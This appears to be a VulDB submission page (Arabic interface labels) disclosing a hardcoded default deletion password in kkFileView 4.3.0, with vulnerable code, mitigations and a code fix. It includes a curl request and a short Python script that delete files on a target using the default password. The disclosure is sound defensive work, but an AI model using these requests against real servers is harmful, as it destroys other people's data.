| عنوان | kkFileView 4.3.0 Weak Password Requirements |
|---|
| الوصف |
**Title**: kkFileView 4.3.0 - Weak Authentication in File Deletion Function Leading to Arbitrary File Deletion
**Product**: kkFileView
**Version**: 4.3.0
---
### Vulnerability Details
#### Description
kkFileView version 4.3.0 contains a weak authentication mechanism in the file deletion functionality. The application uses a hardcoded default password "123456" for file deletion operations, which can be easily guessed or brute-forced by attackers. This vulnerability allows unauthenticated remote attackers to delete arbitrary files within the application's file storage directory without proper authorization.
#### Technical Details
The vulnerability exists in the `/deleteFile` endpoint of the FileController class:
**Vulnerable Code Location**: `server/src/main/java/cn/keking/web/controller/FileController.java`
```java
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName,String password) {
// ... validation ...
if(!ConfigConstants.getPassword().equalsIgnoreCase(password)) {
logger.error("删除文件【{}】失败,密码错误!",fileName);
return ReturnResponse.failure("删除文件失败,密码错误!");
}
// ... file deletion logic ...
}
```
**Default Password Configuration**: `server/src/main/config/application.properties`
```properties
#删除密码
delete.password = ${KK_DELETE_PASSWORD:123456}
```
**Password Constant**: `server/src/main/java/cn/keking/config/ConfigConstants.java`
```java
public static final String DEFAULT_PASSWORD = "123456";
```
#### Attack Vectors
1. **Direct HTTP Request**:
```bash
curl "http://target:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
```
2. **Automated Attack Script**:
```python
import requests
import base64
target = "http://target:8012"
files = ["demo/test.pdf", "demo/document.docx"]
for file in files:
encoded = base64.b64encode(file.encode()).decode()
requests.get(f"{target}/deleteFile?fileName={encoded}&password=123456")
```
#### Impact
- **Confidentiality**: No direct impact
- **Integrity**: High - Attackers can delete uploaded files
- **Availability**: Medium - Can disrupt file preview services
- **Authentication**: Complete bypass of deletion authorization
#### Affected Components
- File deletion endpoint: `/deleteFile`
- Default configuration files
- Password validation logic
---
### Proof of Concept
#### Step-by-Step Reproduction
1. Deploy kkFileView 4.3.0 with default configuration
2. Upload a test file using `/fileUpload` endpoint
3. Obtain file list using `/listFiles` endpoint
4. Delete any file using default password "123456":
```bash
curl "http://localhost:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
```
#### Expected Result
File deletion should require proper authentication.
#### Actual Result
Files can be deleted using the weak default password.
---
### Solution
#### Immediate Mitigation
1. Change the default password in `application.properties`:
```properties
delete.password = strong_unique_password_here
```
2. Disable file deletion if not required:
```properties
file.upload.disable = true
```
#### Recommended Fix
1. Implement proper user authentication system
2. Use strong password policies
3. Add rate limiting to prevent brute-force attacks
4. Implement audit logging for deletion operations
5. Use cryptographically secure tokens instead of passwords
#### Code Fix Example
```java
// Replace weak password check with proper authentication
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName, HttpServletRequest request) {
if (!isAuthenticated(request)) {
return ReturnResponse.failure("Authentication required");
}
if (!hasDeletePermission(request)) {
return ReturnResponse.failure("Insufficient permissions");
}
// ... proceed with deletion ...
}
```
|
|---|
| المصدر | ⚠️ https://github.com/rassec2/kkfile/edit/main/4.3kkfile.md |
|---|
| المستخدم | yudeshui (UID 91129) |
|---|
| ارسال | 30/09/2025 09:24 AM (7 أشهر منذ) |
|---|
| الاعتدال | 19/10/2025 04:53 AM (19 days later) |
|---|
| الحالة | مكرر |
|---|
| إدخال VulDB | 207741 [kkFileView 4.0.0 FileController.java fileName الحرمان من الخدمة] |
|---|
| السبب | Product not identifiable. Please reply with name and website of the affected product. |
|---|
| النقاط | 0 |
|---|